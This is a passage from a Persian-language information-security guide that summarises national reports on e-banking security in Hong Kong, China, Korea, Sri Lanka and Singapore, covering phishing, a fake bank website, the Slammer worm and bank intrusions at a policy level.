ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﻮﺡ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ
ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺍﻓﺰﺍﻳﺶ ﺷﻔﺎﻓﻴﺖ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﭼﻴﻦ ،ﻫﻨﮓﻛﻨﮓ
ﺩﺭ ﻫﻨﮓﻛﻨﮓ ،ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻌﻠﻲ ،ﻭﻳﺮﻭﺳﻬﺎ ،ﻭ ﻛﺮﻣﻬﺎ
ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﺤﻮﺓ ﺭﻓﺘـﺎﺭ ﻣﻬـﺎﺟﻤﻴﻦ
ﻫﻢ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻛـﺸﻮﺭ ﺑﺠـﺎﻱ ﻫـﺪﻑ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻦ ﻣﺴﺘﻘﻴﻢ ﺑﺎﻧﻜﻬﺎ ،ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘـﻪ -ﻳﻌﻨـﻲ ﻣـﺸﺘﺮﻱ -
ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺁﻣـﻮﺯﺵ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ
ﺣﻴﺎﺗﻲ ﺍﺳﺖ.
ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﺑﺎﻧﻚ ﺟﻌﻠﻲ
ﺭﻭﻱ ﺩﺍﺩ ،ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺁﺷـﻜﺎﺭﺗﺮ ﻛـﺮﺩ .ﺍﻳـﻦ ﺑﺎﻧـﻚ ﺩﺭ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ،ﻳﻚ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﻧﺎﻗﺺ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩ ﻭ ﺍﺯ ﮔﻮﺍﻫﻲ
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ ،ﺑﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ
ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻌﺮﺽ ﻧـﺎﺑﻮﺩﻱ ﺳـﺮﻳﻊ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ
ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ
ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺑﺎ ﺍﻳﻨﻜﻪ ﺩﻧﻴﺎ ﻧﻴﺎﺯﻣﻨﺪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﭘﻴﮕﺮﺩﻫـﺎﻱ
ﻗــﺎﻧﻮﻧﻲ ﺑــﺼﻮﺭﺕ ﺩﻳﺠﻴﺘــﺎﻝ ﺍﺳــﺖ ،ﺍﻣــﺎ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺭﻭﺵ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻛﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺑﺎﺷﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﻧﻤﺎﻳﻨﺪﺓ ﭼﻴﻦ ﺑﻴـﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭﺧـﺼﻮﺹ
ﺟﺎﻳﮕﺎﻩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻳﻦ
ﻣﻘﺼﻮﺩ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺧﺎﺭﺟﻲ ﺑﻴﺸﺘﺮﻱ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﺍﺳـﺖ .ﻳﻜـﻲ ﺍﺯ
ﻋﻤﺪﺓ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﭼﻴﻦ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺎ ﺁﻥ
ﻣﻮﺍﺟﻪ ﻣﻲﺑﺎﺷﺪ ﻓﻘﺪﺍﻥ ﺁﮔﺎﻫﻲ ﻭ ﺗﻮﺍﻧﺎﻳﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ
ﻣﺨﺎﻃﺮﺍﺕ )ﺑﺨﺼﻮﺹ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﺎﻫﻴﺖ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻳﻬﺎ( ﺍﺳﺖ .ﺍﻳـﻦ
ﻣﺸﻜﻞ ﺩﺭ ﻛﺸﻮﺭ ﭼﻴﻦ ﺑﺪﻟﻴﻞ ﻫﻤﻜـﺎﺭﻱ ﺿـﻌﻴﻒ ﻣﻴـﺎﻥ ﻣﺮﺍﻛـﺰ
ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﻣﺮﺍﻛﺰ ﻧﻈﺎﺭﺗﻲ ﺗﺸﺪﻳﺪ ﻫﻢ ﺷﺪﻩ ﺍﺳﺖ.
٢٢٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﻳﺠﻴﺘﺎﻝ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲ ﻛﺮﺩ ،ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺩﻋـﺎ ﺩﺍﺷـﺖ ﻛـﻪ
ﺩﻓﺎﺗﺮﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻭ ﻧﻘﺎﻁ ﺩﻳﮕﺮ ﺩﺍﺭﺩ؛ ﺍﻣﺎ ﺩﺭ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻣﻌﻠـﻮﻡ
ﺷﺪ ﻛﻪ ﻫﻢ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ )ﻛـﻪ ﺩﺭ ﭼـﻴﻦ ﻣﻴﺰﺑـﺎﻧﻲ ﻣـﻲﺷـﺪ( ﻭ ﻫـﻢ
ﺑﺎﻧﻚ ﻣﻮﺭﺩ ﺍﺩﻋﺎ ﺟﻌﻠﻲ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻭﺍﻗﻌﻪ ﺑﺎﺭ ﺩﻳﮕﺮ ﻧﻴﺎﺯ ﺣﻴـﺎﺗﻲ
ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛـﺮﺩ ،ﺑﺨـﺼﻮﺹ ﺑـﻪ ﺍﻳـﻦ
ﺩﻟﻴﻞ ﻛﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ،ﺧﻮﺩ ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻋﻤـﻞ
ﻣﻲﻛﻨﻨﺪ.
ﻛﺸﻮﺭ ﻫﻨﮓﻛﻨﮓ ﺩﺭﺣﺎﻝ ﺗﻬﻴﺔ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺑﺴﺘﺮﻫﺎﻱ
ﻧﻈﺎﺭﺕ ﺑﺮ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺁﻣـﻮﺯﺵ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺳـﺖ ،ﻣﺜـﻞ ﺍﻧﺘـﺸﺎﺭ
ﺭﺍﻫﻨﻤﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﺑﻌـﺎﺩ ﺣﻴـﺎﺗﻲ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻼﻥ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟـﺮﺍﺋﻢ
ﺭﺍﻳﺎﻧﻪﺍﻱ .ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﺮ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﻳـﻦ
ﻛﺸﻮﺭ ﺑﺎ ﺛﺒﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺍﻣﻨﻪ ٢٤٠ﺭﺍﺑﻄـﺔ ﻧﺰﺩﻳﻜـﻲ ﺩﺍﺭﺩ ﻭ ﺑـﺮﺍﻱ
ﻛﻨﺘﺮﻝ ﻧﺎﻣﻬﺎﻱ ﺩﺍﻣﻨﺔ ﻣﺤﻠﻲ ) (.hkﺍﺯ ﻓﺮﺁﻳﻨﺪﻱ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ
ﻣﻲ ﻛﻨﺪ :ﺍﮔﺮ ﻭﺍﮊﺓ "ﺑﺎﻧﻚ" ﻳﺎ ﻫﺮ ﺷﻜﻞ ﺩﻳﮕـﺮ ﺁﻥ ﺩﺭ ﻧـﺎﻡ ﺩﺍﻣﻨـﻪ
ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺑﺎﺷﺪ ،ﻣﻮﺿﻮﻉ ﺑﻼﻓﺎﺻـﻠﻪ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻲ ﺑـﻪ ﻣﺮﺍﺟـﻊ
ﺫﻳﺼﻼﺡ ﺍﺭﺟﺎﻉ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ .ﻧﻴﺮﻭﻫﺎﻱ ﭘﻠﻴﺲ ،ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﻫﻨـﮓﻛﻨـﮓ ﻫـﻢ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ
ﻗﺎﺑﻠﻴﺖ ﻭﺍﻛﻨﺶ ﺳﺮﻳﻊ ﺑﻪ ﺭﺧـﺪﺍﺩﻫﺎ ،ﺑـﺎ ﻧﻬﺎﺩﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺩﺭ
ﺳــﻄﻮﺡ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﻫﻤﻜــﺎﺭﻱ ﺩﺍﺭﻧــﺪ .ﺳﻴــﺴﺘﻢ ﻧﻈــﺎﺭﺕ ﺑــﺮ
ﺧﻮﺩﺍﺭﺯﻳﺎﺑﻲ ) ٢٤١(CSAﺩﺭ ﭼﻴﺰﻱ ﺣﺪﻭﺩ ۷۰ﺗﺎ ۸۰ﺑﺎﻧـﻚ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ ﻭ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺧﺎﺹ ﺍﺭﺯﻳﺎﺑﻲ ﺳﺎﻻﻧﻪ ،ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻴـﺰ
ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ.
ﺟﻤﻬﻮﺭﻱ ﻛﺮﻩ
ﺑﺎ ﺍﻳﻨﻜﻪ ﻛﺮﻩ ﻧﺘﻮﺍﻧﺴﺖ ﺩﺭ ﺍﻳﻦ ﺑﺤﺚ ﺟﻬﺎﻧﻲ ﺷﺮﻛﺖ ﻛﻨﺪ ،ﺍﻣﺎ ﺑـﻪ
ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭘﺎﺳﺦ ﺩﺍﺩ .ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ
ﻛﺮﺩﻧﺪ ﻛﻪ ﺍﮔﺮﭼﻪ ﻛﺮﻩ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﭘﻴـﺸﺮﻓﺘﻪﺍﻱ
ﺍﺳﺖ ،ﺍﻣﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺁﻧﻬﺎ ﻫﻨﻮﺯ ﺟﺎ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎ ﺩﺍﺭﺩ .ﺩﺭ ﻛـﺮﻩ
%۶۵ﻣﻌﺎﻣﻼﺕ ﺑﻮﺭﺱ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ ﻭ ﺣﺪﻭﺩ
۲۵ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ .ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﺧﻴـﺮ
ﻣﺜﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﻛـﺮﻡ Slammerﺩﺭ ﮊﺍﻧﻮﻳـﺔ ۲۰۰۳ﺗـﺄﺛﻴﺮﺍﺕ
ﺷﺪﻳﺪﻱ ﺩﺭ ﻛﺮﻩ ﺩﺍﺷﺖ ﻭ ﻃﺒﻴﻌﺖ ﺷﻜﻨﻨﺪﺓ ﺷـﺒﻜﻪﻫـﺎ ﺭﺍ ﺁﺷـﻜﺎﺭ
ﻛﺮﺩ.
240 Domain Registrar
241 Supervisory Control Self-Assessment
ﻛﺮﻩ ﺁﻣﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻛﺮﺩ ﻛﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﺍﻓـﺮﺍﺩ ﺩﺭ
ﺧﺼﻮﺹ ﺍﻳﻤﻨـﻲ ﺳﻴـﺴﺘﻢ ﺑـﻮﺩ .ﺑـﻪ ﮔﻔﺘـﺔ ﻭﺯﺍﺭﺕ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺗﻨﻬﺎ %۱۲،۹ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ%۱۶،۷ ،
ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ ،ﻭ %۹،۲ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻳﮕـﺮ ﺩﺍﺭﺍﻱ ﺑﺨـﺸﻲ
ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻫـﺴﺘﻨﺪ .ﻛـﺮﻩ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻫﺰﻳﻨﺔ ﻣﺒﻬﻢ
ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺑـﺎ ﺗﺨـﺼﻴﺺ ﻣﻨـﺎﺑﻊ ﻭ ﺯﻣـﺎﻥ ﻛـﺎﻓﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﻣﻲﺭﺳﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﻨﻬﺎ ﺣـﺪﻭﺩ %۱۲،۹ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ %۶،۱ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺍﺯ ﺧﻮﺩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ.
ﺳﺮﻳﻼﻧﻜﺎ
ﻧﻤﺎﻳﻨﺪﺓ ﺳﺮﻳﻼﻧﻜﺎ ﺑﻴﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ
ﻣﺜﻞ ﻛﺮﻣﻬﺎ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻣـﺎ ﻣﻘﺎﻣـﺎﺕ
ﺳﺮﻳﻼﻧﻜﺎ ﺗﺎ ﻛﻨـﻮﻥ ﻫـﻴﭻ ﮔﺰﺍﺭﺷـﻲ ﺩﺭﺧـﺼﻮﺹ ﺣﻤـﻼﺕ ﺑـﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ .ﺍﻳﻦ ﻛﺸﻮﺭ ﺣﺪﻭﺩ ۲۰ﺳﺎﻝ
ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ .ﻫﺮﭼﻨـﺪ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﻳﻼﻧﻜﺎ ﺩﺭ ﺍﺑﺘﺪﺍﻱ ﺭﺍﻩ ﺍﺳﺖ ﺍﻣـﺎ ﺑـﻪ
ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﻭﺍﺝ ﻣﻲﺑﺎﺷـﺪ .ﺗﺒـﺎﺩﻝ ﺳـﻬﺎﻡ ﻭ ﭘـﻮﻝ ﺑـﺼﻮﺭﺕ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﺍﺳﺖ ،ﺍﻣﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻣﻜﺎﻧـﺎﺕ ﻧﻴـﺰ ﻫﻨـﻮﺯ ﺩﺭ
ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﺔ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺳـﺮﻳﻼﻧﻜﺎ
ﻣﻬﻤﺘﺮﻳﻦ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ،ﺳﺮﻗﺖ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ
ﻋﺒﻮﺭ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ،ﺳـﻄﺢ ﺁﮔـﺎﻫﻲ ﺍﺯ
ﻣﺨﺎﻃﺮﺍﺕ ﻳﻚ ﻣﺴﺌﻠﻪ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ
ﺑﻪ ﺩﻗﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ.
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺑﺨﺶ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ
ﺗﻮﻧﻲ ﭼﻮ ٢٤٢ﻣﺪﻳﺮ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺍﺩﺍﺭﺓ ﺍﻣـﻮﺭ
ﭘﻮﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ) ٢٤٣(MASﻣﺮﻭﺭﻱ ﺍﺟﻤﺎﻟﻲ ﺑﺮ ﻣﻘـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ
ﺳﺎﻳﺒﺮ ﺩﺍﺷﺖ .ﻭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺑﻴﺎﻥ ﺍﻳﻦ ﻣﻄﻠـﺐ ﺁﻏـﺎﺯ ﻛـﺮﺩ
ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺨﺶ ﺍﻭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﺑﻪ ﻣﺆﺳﺴﺎﺕ ﺁﮔﺎﻫﻲ ﺩﻫﺪ،
ﺁﻧﻬﺎ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﻫﺪ ،ﻭ ﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﻬـﺎ ﺳـﺨﺘﮕﻴﺮﻱ
ﻧﻤﺎﻳﺪ" .ﺳﻨﮕﺎﭘﻮﺭ ﻣﻲﻛﻮﺷﺪ ﺗﺎ ﺑﻪ ﻳﻚ ﻛﺎﻧﻮﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺁﻥ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ.
242 Tony Chew
243 Monetary Authority of Singapore
٢٢٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻜﻬﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ۲۰۰۱ﻭ ۲۰۰۲ﺗﻮﺳﻂ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ؛ ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻧﻴـﺎﺯ
ﻓﻮﺭﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﻪ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ
ﺍﺳﺖ .ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻚ ﺳﻨﮕﺎﭘﻮﺭ ) (UOBﻭﺟـﻮﺩ
ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺧﻮﺩ ﻛﺸﻒ ﻛـﺮﺩ.
ﺑﺎ ﺍﻳﻨﻜﻪ ﺑﻴﺸﺘﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﺎﻗﻲ
ﻣﺎﻧﺪ ،ﺍﻣﺎ ﻣﻌﻠﻮﻡ ﺷﺪﻛﻪ ﻧﻔﻮﺫﮔﺮﻫﺎﻳﻲ ﺍﺯ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺑﻪ ﺳﻴﺴﺘﻢ
ﺑﺎﻧﻜﻲ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ .ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ
ﮔﺮﻓﺖ ﻭ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺟﻬـﺖ ﺑـﻪﺭﻭﺯﺁﻭﺭﻱ ﺣـﺴﺎﺏ ﻣـﺸﺘﺮﻳﺎﻥ
ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪ .ﻧﻪﺗﻨﻬﺎ ﭼﻨﺪ ﻣﺎﻩ ﻃﻮﻝ ﻛﺸﻴﺪ ﺗﺎ ﻣﺘﺨﺼﺼﻴﻦ ﺍﺻﻞ
ﻣﺸﻜﻞ ﺭﺍ ﺑﻴﺎﺑﻨﺪ ،ﺑﻠﻜﻪ ﺗﻼﺵ ﺯﻳﺎﺩ ﻭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺻﺮﻑ ﺷﺪ ﺗﺎ
ﻛﺸﻒ ﺷﻮﺩ ﻛﻪ ﭼﻪ ﻛـﺴﺎﻧﻲ ﻭ ﻳـﺎ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﻋﻮﺍﻣـﻞ ﺍﻳـﻦ
ﻣﺸﻜﻞ ﺑﻮﺩﻩﺍﻧﺪ.
ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺭﺧﺪﺍﺩﻫﺎ ﺗﺄﺛﻴﺮ ﺩﺍﺷـﺖ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻚﻋﺎﻣﻠﻲ ﺑﻮﺩ .ﻫﻢﺍﻛﻨﻮﻥ ﻧﻴﺰ ﺑﻴـﺸﺘﺮ
